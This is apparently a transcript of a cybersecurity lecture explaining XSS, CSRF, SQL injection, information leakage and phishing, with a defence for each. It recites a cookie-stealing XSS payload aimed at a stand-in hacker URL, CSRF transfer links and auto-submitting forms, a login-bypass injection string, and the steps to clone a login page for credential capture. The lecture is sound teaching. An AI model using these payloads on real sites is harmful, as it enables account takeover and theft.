here. Why? Because they're trying to visit my profile page. My profile page contains literally these characters which are going to be interpreted as HTML. And it's going to add document.write-- that's a JavaScript way of saying add the following line in addition to the HTML of the page-- image source equals hacker url?cookie= and then document.cookie. So imagine that I, again, control hacker URL. Presumably, as somebody who is running a website, I also maintain logs of every time somebody tries to access my website, what page on my site they're trying to visit. If somebody goes to my Facebook profile and executes this, I'm going to get notified via my hacker URL logs that somebody has tried to go to that page ?cookie= and then document.cookie. Now, document.cookie in this case, because this exists on my Facebook profile, is an individual's cookie for Facebook. So here what I am doing-- again, Facebook does defend against cross-site scripting attacks, so this can't actually happen on Facebook. But assuming that they did not defend against them adequately, what I'm basically doing is getting told via my log that somebody tried to visit some page on my URL, but the page that they tried to visit, I'm plugging in and basically stealing the cookie that they use for Facebook. And a cookie, recall, is sort of like a hand stamp. It's basically me, instead of having to re-log into Facebook every time I want to use it, going up to Facebook and saying, here. You've already verified my identity. Just take a look at this, and you get let in. And now I hypothetically know someone else's Facebook cookie. And if I was clever, I could try and use that to change what my Facebook cookie is to that person's Facebook cookie. And then suddenly I'm able to log in and view their profile and act as them. This image tag here is just a clever trick because the idea is that it's trying to pull some resource from my site. It doesn't exist. I don't have a list of all the cookies on Facebook. But I'm being told that somebody is trying to access this URL on my site. So the image tag is just sort of a trick to force it to log something on my hacker URL. But the idea here is that I would be able to steal somebody's Facebook cookie where this attack's not well-defended against. So what techniques can we use either for our own sites when we are running to avoid cross-site scripting vulnerabilities or to protect against cross-site scripting vulnerabilities? The first technique that we can use is to sanitize, so to speak, all of the inputs that come in to our page. So let's take a look at how exactly we might do this. So it turns out that there are things called HTML entities, which are other ways of representing certain characters in HTML that might be considered special or control characters, so things like, for example, this or this. Typically, when a browser sees a character left angle bracket or right angle bracket, it's going to automatically interpret that as some HTML that it should then process. So in the example I just showed a moment ago, I was using the fact that whenever it sees angle brackets with script around it, they're going to try and interpret whatever is between those tags as a script. One way for me to prevent that from being interpreted as a script is to call this or call this something else other than just left angle bracket and right angle bracket. And it turns out that there are these things called HTML entities that can be used to refer to these characters instead, such that if I sanitize my input in such a way that every time somebody literally typed the character left angle bracket, I had written some code that automatically took that and changed it into ampersand lt;. And then every time somebody wrote a greater than character, or right angle bracket, I changed that in the code to ampersand gt;. Then when my page was responsible for processing or interpreting something, it wouldn't interpret this-- it would still display this character as a left angle bracket or less than-- that's what the lt stands for here-- or a right angle bracket, greater than. That's what the gt stands for there. It would literally just show those characters and not treat them as HTML. So that's the idea of what it means to sanitize input when we're talking about HTML entities, for example. Another thing that we could do is just disable JavaScript entirely. This would have some upsides and some downsides. The upside is you're pretty protected against cross-site scripting vulnerabilities because they're usually going to be introduced via JavaScript. The downside is JavaScript is pretty convenient. It's nice. It makes for a better user experience. Sometimes there might be parts of our page that just don't work if JavaScript is completely disabled, and so trade-offs there. You're protecting yourself, but you might be doing other sorts of non-material damage. Or we could decide to just handle the JavaScript in a special way. So for example, we might not allow what's called inline JavaScript, for example, like the script tags that I just showed a moment ago. But we might allow JavaScripts written in separate JavaScript files which can also be linked into your HTML pages. So those would be allowed, but inline JavaScript, like what we just saw, would not be allowed. We could sandbox the JavaScript and run it separately somewhere else first to see if it does something weird, and if it doesn't do something weird, then allow it to be displayed. We could also execute the content security policy. Content security policy is another header that we can add to our HTML pages or HTTP responses. And we can define certain behavior to happen such that will allow certain lines or certain types of JavaScript through but not others. Now, there's another type of attack that can be used that relies heavily on the fact that we use cookies so extensively, and that is a cross-site request forgery, or a CSRF. Now, cross-eyed scripting attacks generally involve receiving some content and the client's browser being tricked into doing something locally that it didn't want to do. In a CSRF request, or CSRF attack, rather, the trick is we're relying on the fact that there is a cookie that can be exploited to make a an outbound request, an outbound HTTP request that we did not intend to make. And again, this relies extensively on cookies because they are this shorthand, short-form way to log into something. And we can make a fraudulent request appear legitimate if we can rely on someone's cookie. Now, again, if you ever use a cloud service for example, they're going to have CSRF defenses built into them. This is really if you're building a simple site and you don't defend against this. Flask, for example, does not defend against this particularly well, but Flask is a very simple web framework for servers. They're generally going to be much more complicated than that and have much more additional functionality to be more featurefull. So let's walk through what these cross-site request forgeries might look like. And for context, let's imagine that I send you an email asking you to click on some URL. So you're going to click on this link. It's going to redirect you to some page. Maybe that page looks something like this. It's pretty simple, not much going on here. I have a body. And inside of it I have one more link. And the link is http://hackbank.com/ transfertodoug=amt500. Now, perhaps you don't hover over it and see the link at the beginning of it. But maybe you are a customer of Hack Bank. And maybe I know that you're a customer of Hack Bank such that if you click on this link and if you happen to be logged in, and if you happen to have your cookie set for hackbank.com, and this was the way that they actually executed transfers, by having you go to /transfer and say to whom you want to send money and in what amount-- And fortunately, most banks don't actually do this. Usually, if you're going to do something that manipulates the database, as this would, because it's going to be transferring some amount of money somewhere that would be via HTTP POST request-- this is just a straightforward GET request I'm making here. If you were logged in, though, to Hack Bank, or if you're cookie for Hack Bank was set and you clicked on this link, hypothetically, a transfer of $500-- again, assuming that this was how you did it, you specified a person and you specified an amount-- would be transferred from your account to presumably my account. That's probably not something you intended to do. So that would be an example of why this is a cross-site request forgery. It's a legitimate request. It appears that you intended to do this because it came from you. It's using your cookie. But you didn't actually intend for it to happen. Here's another example. You click on the link in my email and you get brought to this page. So there's not actually even a second link to click anymore. Now it's just trying to load an image. Now, looking at this URL, we can tell there's not an image there. It doesn't end in jpeg or .pmg or the like. It's the same URL as before. But my browser sees image source equals something and says, well, I'm at least going to try and go to that URL and see if there is an image there to load for you. Again, you just click on the link in the email. This page loads. My browser tries to go to this page, or your browser in this case tries to go to this page to load the image there. But in so doing, it's, again, executing this unintended transfer, relying on your cookie at hackbank.com. Another example of this might be a form. So again, it appears that you click on the link in the email. You get brought to a form that just has now just a button at the bottom of it that says Click Here. And the reason it just has a button, even though there's other stuff written, is that those first two fields are hidden. They are type equals hidden, which means you wouldn't actually see them when you load your browser. Now, contrast this, for example, with a field whose type is text, which you might see if you're doing a straightforward login. You would type characters in and see the actual characters appear. That's text versus a password field where you would type characters in and see all stars. It would visually obscure what you typed. The action of this form, or so to say where the form-- what happens when you click on the Submit button at the bottom is the same as before. It's hackbank.com/transfer. And then I'm using these parameters here; to Doug, the amount of $500, Click Here. Now I actually am using a notice also POST request to try to initiate this transfer, again, assuming that this was how Hack Bank structured transfer requests in this way. So if you clicked here and this was otherwise validly structured and you were logged in, or your cookie was valid for Hack Bank, then this would initiate a transfer of $500. And I can play another similar trick to what I did a moment ago with the image by doing something like this where, when the page is loaded, instantly submit this form. So you don't even have to click here anymore. It's just going to go through the document, document being JavaScript's way of referring to the entire web page, find the first form, form zeros, assuming this is the first form on the page, and just submit it. Doesn't matter what else is going on. Just submit this form. That would also initiate transfer if you clicked on that link from my email. So a quick summary of these two different types of attacks. Cross-site scripting attacks, the adversary tricks you into executing code on your browser to do something locally that you probably did not intend. And a cross-site request forgery, something that appears to be a legitimate request from your browser because it's relying on cookies, your ostensibly logged in in that way, but you don't actually mean to make that request. Now let's talk about a couple of vulnerabilities that exist in the context of a database, which I know you've discussed recently as well. So imagine that I have a table of users on my database that looks like this, that each of them has an ID number, they have a username, and they have a password. Now, the obvious vulnerability here is I really shouldn't be storing my users' passwords like this in the clear. If somebody were to ever hack and get a hold of this database file, that's really, really bad. I am not taking best practices to protect my customers' information. So I want to avoid doing that. So instead what I might do, as we've discussed, is hash their passwords, run them through some hash function so that when they're actually stored, they get stored looking something like this. You have no idea what the original password was. And because it's a hash, it's irreversible. You should not be able to undo what I did when I ran through the hash function. But there's actually still a vulnerability here. And the vulnerability here is not technical. It's human again. And the vulnerability that exists here is that we see-- we're using a hash function, so it's deterministic. When we pass some data through it, we're going to get the same output every time we pass data through it. And two of our users, Charlie and Eric, have the same hash. We saw this makes sense, because if we go back a moment, they also had the same actual password when it was stored in plain text. We've gone out of our way to try and defend against that by hashing it. But somebody who gets a hold of this database file, for example, they hack into it, they get it, they'll see two people have the same password. And maybe this is a very small subset of my user base. And maybe there's hundreds of thousands of people. And maybe 10% of them all have the same hash. Well, again, human beings, we are not the best at defending our own stuff. It's a sad truth that the most common password is password followed by some of these other examples we had a second ago. All of these are pretty bad passwords. They're all on the list of some of the most commonly used passwords for all services, which means that if you see a hash like this, it doesn't matter that we have taken steps to protect our users against this. If we see a hash like this many, many times in our database, a clever hacker, a clever adversary might think, oh, well, I'm seeing this password 10% of the time, so I'm going to guess that Charlie's password for the service is 12345 and they're wrong. And then they'll maybe try abcdef and they're wrong, and then maybe try password and they're right. And then all of a sudden every time they see that hash, they can assume that the password is password for every single one of those users. So again, nothing we can do as technologists to solve this problem. This is really just getting folks to understand that using different passwords, using non-standard passwords, is really important. That's why we talked about password managers and maybe not even knowing your own passwords in a prior lecture. There's another problem that can exist, though, with databases, in particular, when we see screens like this. So this is a contrived login screen that has a username and password field And a Forgot Password button whose purpose in life is, if you type in your email address and you-- which is the username in this case, and you have the Forgot Password box checked, and you try and click login, instead of actually logging you in, it's going to email you, hopefully, a link to your password, not your actual password for reasons we previously discussed as well. But what if when we click on this button we see this? OK. We've emailed you a link to change your password. Does that seem inherently problematic? Perhaps not. But what about if you see this as well? Somebody might see this if they're logged in as well. Sorry, no user with that email address. Does that perhaps seem problematic when you compare it against this? This is an example of something called information leakage. Perhaps an adversary has hacked some other database where folks were not being as secure with credentials. And so they have a whole set of email addresses mapped to credentials. And because human beings tend to reuse the same credentials on multiple different services, they are trying different services that they believe that these users might also use using those same username and password combinations. If this is the way that we field these types of forgot password inquiries, we're revealing some information potentially. If Alice is a user, we're now saying, yes, Alice is a user of this. Try this password. If we get something like this, then the adversary might not bother trying. They've realized, oh, Alice is not a user of this service. And even if they're not trying to hack into it, if we do something like this, we're also telling that adversary quite a bit about Alice. Now we know Alice uses this service, and this service, and this service, and not this service. And they can sort of create a picture of who Alice might be. They're sort of using her digital footprint to understand more about her. A better response in this case might be to say something like this, request received. If you're in our system, you'll receive an email with instructions shortly. That's not tipping our hand either way as to whether the user is in the database or not in the database. No information leakage here, and generally a better way to protect our customer's privacy. Now, that's not the only problem that we can have with databases. We've alluded to this idea of SQL injection. And there's this comment that gets the rounds quite a bit when we talk about SQL injection from a web comic called XKCD that involves a SQL injection attack, which is basically providing some information that-- or providing some text or some query that we want to make to a database where that query actually does something unintended. It actually itself is SQL as opposed to just plugging in some parameter, like what is your name, and then searching the database for that name. Instead of giving you my name, I might give you something that is actually a SQL query that's going to be executed that you don't want me to execute. So let's see an example of how this might work. So here's another simple username and password field. And in this example, I've written my password field poorly intentionally for purposes of the example so that it will actually show you the text that is typed as opposed to showing you stars like a password field should. So this is something that the user sees when they access my site. And perhaps on the back end in the server-side code, inside of Python somewhere I have written a SQL query that looks like the following. When the login button is clicked, execute the following SQL query. SELECT star from users where username equals uname-- and uname here in yellow referring to whatever was typed in this box-- and password equals pword, where, again, pword is referring to whatever was typed in this box. So we're doing a SQL query to select star from users, get all of the information from the users table where the username equals whatever they typed in that box and the password equals whatever they typed in that box. And so, for example, if I have somebody who logs in with the username Alice and the password 12345, what the query would actually look like with these values plugged into it might look something like this; SELECT star from users where username equals Alice and password equals 12345. If there is nobody with username Alice or Alice's password is not 12345, then this will fail. Both of those conditions need to be true. But what about this? Someone whose username is hacker and their password is 1' or '1' equals '1. That looks pretty weird. And the reason that that looks pretty weird is because this is an attempt to inject SQL, to trick SQL into doing something that is presumably not intended by the code that we wrote. Now, it probably helps to take a look at it plugging the data in to see what exactly this is going to do. SELECT star from users where username equals hacker or-- excuse me, and password equals '1' or and so on and so on. Maybe I do have a person whose username actually is hacker, but that's probably not their password. That doesn't matter. I'm still going to be able to log in if I have somebody whose username is hacker. And the reason for that is because of this or. I have sort of short circuited the end of the SQL query. I have this quote mark that demarcates the end of what the user presumably typed in. But I've actually literally typed those into my password to trick SQL such that if hacker's password equals 1, it just happens to literally be the character 1, OK, I have succeeded. I guess that's a really bad password, and I shouldn't be able to log it in that way, but maybe that is the case and I'm able to log in. But even if not, this other thing is true. '1' does equal '1'. So as long as somebody whose username is hacker exists in the database, I am now able to log in as hacker because this is true. This part's probably not true, right? It's unlikely that their password is 1. Regardless of what their password is, this part actually is true. It's a very simple SQL injection attack. I'm basically logging in as someone who I'm presumably not supposed to be able to log in as, but it illustrates the kind of thing that could happen. You are allowing people to bypass logins. Now, it could get worse if your database administrator username is admin or something very common. The default for this is typically admin. This would potentially give people the ability to be database administrators, that they're able to execute exactly this kind of trick on the admin user. Now they have administrative access to your database, which means they can do things like manipulate the data in the database, change things, add things, delete things that you don't want to have deleted. And in the case of a database, deletion is pretty permanent. You can't undo a delete most of the time in a database as the way you might be able to do with other files. Now, are there techniques to avoid this kind of attack? Fortunately, there are. Right now I'd like just to just take a look at a very simple Python program that replicates the kind of thing that one could do in a more robust, more complex SQL situation. So let's pull up a program here where we're just simulating this idea of a SQL injection just to show you how it's not that difficult to defend against it. So let's pull up the code here in this file login.py. So there's not that much going on here. I have x equals input username. So x, recall, is a Python variable. And input username is basically going to prompt the user with the string username and then expect them to type something after that. And then we do exactly the same thing with password except storing the result there in y. So whatever the user types after username will get stored in x. Whatever they type after password will get stored in y. And then here I'm just going to print. And in the SQL context, this would be the query that actually gets executed. So imagine that that's what's happening instead. SELECT star from users where username equals and then this symbol here, '[? x ?]'. What I'm doing here is just using a Python-formatted string. That's what this f here-- it's not a typo-- at the beginning means, is I'm going to plug in whatever the person, the user, typed at the first prompt, which I stored in x here, and whatever the user typed the second prompt that's store in y there. So let's actually just run this program. So let's pop open here for a second. The name of this program is login.py, so I'm going to type python login.py, Enter. Username, Doug. Password, 12345. And then the query, hypothetically, that would get executed if I constructed it in this way is SELECT star from users where username equals Doug and password equals 12345. Seems reasonable. But if I try and do the adversary thing that I did a moment ago, username equals Doug, password equals 1' or '1' equals '1, not a final single quote, and I hit Enter, then I end up with SELECT star from users where username equals Doug and password equals 1 or 1 equals 1. And the latter part of that is true. The former part is false. But it's good enough that I would be able to log in if I did something like that. But we want to try and get around that. So now let's take a look at a second file that might solve this problem. So I'm going to open up login2.py in my editor here. So now it starts out exactly the same, x equals something, y equals something. But I'm making a pretty basic substitution. I'm replacing every time that I see single quotes with double quotes. So I'm replacing every instance of single quote, and I have to preface it with a backslash. Because notice I'm actually using single quotes to identify the character. It just so happens that it's to indicate that I'm trying to substitute something which I'm putting in single quotes. The thing I'm trying to substitute actually is a single quote, and so I need to put a backslash in front of it to escape that character such that it actually gets treated as a single quotation mark character as opposed to some special Python-- Python's not going to try and interpret it in some other way. So I want to replace every instance of a single quote in x with a double quote, and I want to replace every instance of a single quote in y with a double quote. Now, why do I want to do that? Because notice in my actual Python string here I'm using single quotes to set off the variables for purposes of SQL's interpretation of them. So where the user name equals this string, I'm using single quotes to do that. So if my username or my password also contained single quotation mark characters, when SQL was interpreting it, it might think that the next single quote character it sees is the end. I'm done with what I've prompted. And that's exactly how I tricked it in the previous example. I used that first single quote, which seemed kind of random and out of nowhere, to trick SQL into thinking I'm done with this. Then I used the keyword or back now into a SQL and not some string that I'm searching for, and then I would continue this trick going forward. So this is designed to eliminate all the single quotes, because the single quotes mean something very special in the context of my SQL query itself. If you're actually using SQL libraries that are tied into Python, the ability to replace things is much more robust than this example. But even this very simple example where I'm doing just this very basic substitution is good enough to get around the injection attack that we just looked at. So this is now in login2.py. Let's do this. Let's Python login2.py. And we'll start out the same way. We'll do Doug and 12345. And it appears that nothing has changed. The behavior is otherwise identical because I'm not trying to do any tricks like that. SELECT star from users where username equals Doug and password equals 12345. But if I now try that same trick that I did a moment ago, so password is 1' or '1' equals '1 and I hit Enter, now I'm not subject to that same SQL injection anymore because I'm trying to select all the information from the users table where the username is Doug and the password equals-- And notice that here is the first single quote. Here is the second one. So it's thinking that entire thing now is the password. Only if my password is literally 1" or "1" equals "1, then I would be literally logging in. If that happened to be my password, this would work. But otherwise I've escaped. I've stopped the adversary from being able to leverage a simple trick like this to break in to my database when perhaps they're not intended to do so. And again, in actual SQL injection defense, the substitutions that we make are much more complicated than this. We're not just looking for single quote characters and double quote characters, but we're considering semicolons or any other special characters that SQL would interpret as part of a statement. We can escape those out so that users could literally use single quotes or semicolons or the like in their passwords without necessarily compromising the integrity of the entire database overall. So we've taken a look at several of the most common, most obvious ways that an adversary might be able to extract information either from a business or an individual. And these ways are kind of attention-getting in some context. But let's focus now-- let's go back and bring things full circle to something I've mentioned many times, which is humans are the core fatal flaw in all of these security things that we're dealing with here. And so let's bring things full circle by talking about phishing, what phishing is. So phishing is just an attempt by an adversary to prey upon us and our unfortunate general ignorance of basic security protocols. So it's just an attempt to socially engineer, basically, information out of someone. You pretend to be someone that you are not. And if you do so convincingly enough, you might be able to extract information about that person. Now, phishing you'll also see in other contexts that are-- computer scientists like to be clever with their wordplay. You'll see things like netting, which is basically a phishing attack that launches against many people at once, hoping they'll be able to get one or two. There's spear phishing, which is a phishing attack that targets one specific person trying to get information from them. And then there's whaling, which is a phishing attack that is targeted against somebody who is perceived to have a lot of information or whose information is particularly valuable such that you'd be phishing for some big whale. Now, one of the most obvious and easy types of phishing attack looks like this. It's a simple URL substitution. This is how we can write a link in HTML. A is the HTML tag for anchor, which we use for hyperlinks. Href is where we are going to. And then we also have the ability to specify some text at the end of that. These two items do not have to match, as you can see here. I can say we're going to URL2 but actually send you to URL1. This is an incredibly common way to get information from somebody. They think they're going one place but they're actually going someplace else. And to show you, as a very basic example, just how easy it is to potentially trick somebody into going somewhere they're not supposed to and potentially then revealing credentials as well, let's just take a simple example here with Facebook. And why don't we just take a moment to build our own version of Facebook and see if we can't get somebody to potentially reveal information to us? So let's imagine that I have acquired some domain name that's really similar to Facebook.com, like it's off by one character. It's a common typo. For example fs maybe is a common thing. People mistype the A or something like that that would be really not necessarily obvious to somebody at the outset. One way that I might be able to just take advantage of somebody's thinking that they're logging into Facebook is to make a page that looks exactly the same as Facebook. That's actually not very difficult to do. All you have to do is open up Facebook here. And because its HTML is available to me, I can right click on it, view page source, take a second to load here-- Facebook is a pretty big site-- and then I can just control A, copy, select all, copy all of the content, and paste this in to my index.html, and we will save. And then we'll head back into our terminal here, and I will start Chrome on the file index.html, which is the file that I literally just saved my Facebook information in. So start Chrome index.html. You'll notice that it brings me to this URL here, which is the file for where I currently live, or where this file currently lives. And this page looks like Facebook, except for the fact that, when I log in, I then get redirected back to something that actually is Facebook and is not something that I control. But at the outset, my page here at the very beginning looks identical to Facebook. Now, the trick here would be to do something so that the user would provide information here in the email box and then here in the password field such that when they click Login, I might be able to get that information from them. Maybe I just am waiting to capture their information. So the next step for me might be to go back into my random set of stuff here. There's a lot of random code that we don't really care about. But the one thing I do care about is what happens when somebody clicks on this Login button. That is interesting to me. So I'm going to go through this and just do control F, control F just being find, the string login. That's the text that's literally written on the button, so hopefully I'll find that somewhere. I'm told I have eight results. So this is, if I just kind of look around for context to try and figure out where I am in the code, the title of something, so that's probably not it. So I don't want to go there. Create an account or login, not quite what I'm looking for. So go the next one. OK, here we go, input value equals login. So now I found an input that is called login. So this is presumably a button that's presumably part of some form. So if I scroll up a little bit higher, hopefully I will find a form, which I do, form ID. And it has an action. The action is to go to this particular page, facebook.com/login/ and so on and so on. But maybe I want to send it somewhere else. So if I replace this entire URL with where I actually want to send the user, where maybe I'm going to capture their information, maybe I'll store this in login.html. And so that's what's going to come in here. And then we'll save the file such that our changes have been captured. So presumably what should happen is now, when you click on the Login button in my fake Facebook, you instead get redirected to login.html rather than the Facebook actual login as we saw just a moment ago. So let's try again. We'll go back here to our fake Facebook page. We will refresh so that we get our new content. Remember, we just changed the HTML content, so we actually need to reload it so that our browser has it. And we'll type in abc@cs50.net and then some password here and click Login, and we get redirected here. Sorry, we are unable to log you in at this time. But notice we're still in a file that I created. I didn't show you login.html, but that's exactly what I put there. Now, I'm not actually going to phish for information here. And I'm going to do something that would arguably vio-- even though I'm using fake data here, I'm not going to do something that would violate the terms of service or get myself in trouble by actually attempting to do some phishing here. But imagine instead of some HTML I had some Python code that was able to read the data from that field. We saw that a moment ago with passwords, right? We know that the possibility exists that if the user types something into a field, we have the ability to extract it. What I could do here is very simple. I could just read those two fields where they typed a username and a password but then display this content. Perhaps it's been the case that you've gone to some website and seen, oh, yeah, sorry, the server can't handle this request right now, or something along those lines. And you maybe think nothing of it. Or maybe I even would then have a link here that says, try again. And if you click Try Again, it would bring you back to Facebook's actual login where you would then enter your credentials and try again and perhaps think everything was fine. But if on this login page I had extracted your username and password by tricking you into thinking you were logging into Facebook, and then maybe I save those in some file somewhere and then just display this to you, you think, ah, they just had an error. Things are a little bit busy. I'll try again. And when you try again, it works. It's really that easy. And the way to avoid phishing expeditions, so to speak, are just to be mindful of what you're doing. Take a look at the URL bar to make sure that you're on the page that you think you're on. Hopefully you've come away now with a bit more of an understanding of cybersecurity and some of the best practices that are put in place to deal with potential cybersecurity threats. Now it's incumbent upon us to use the technology that we have available to help us protect ourselves from ourselves, but not only ourselves and our own data, but also working to protect our clients and their data as well.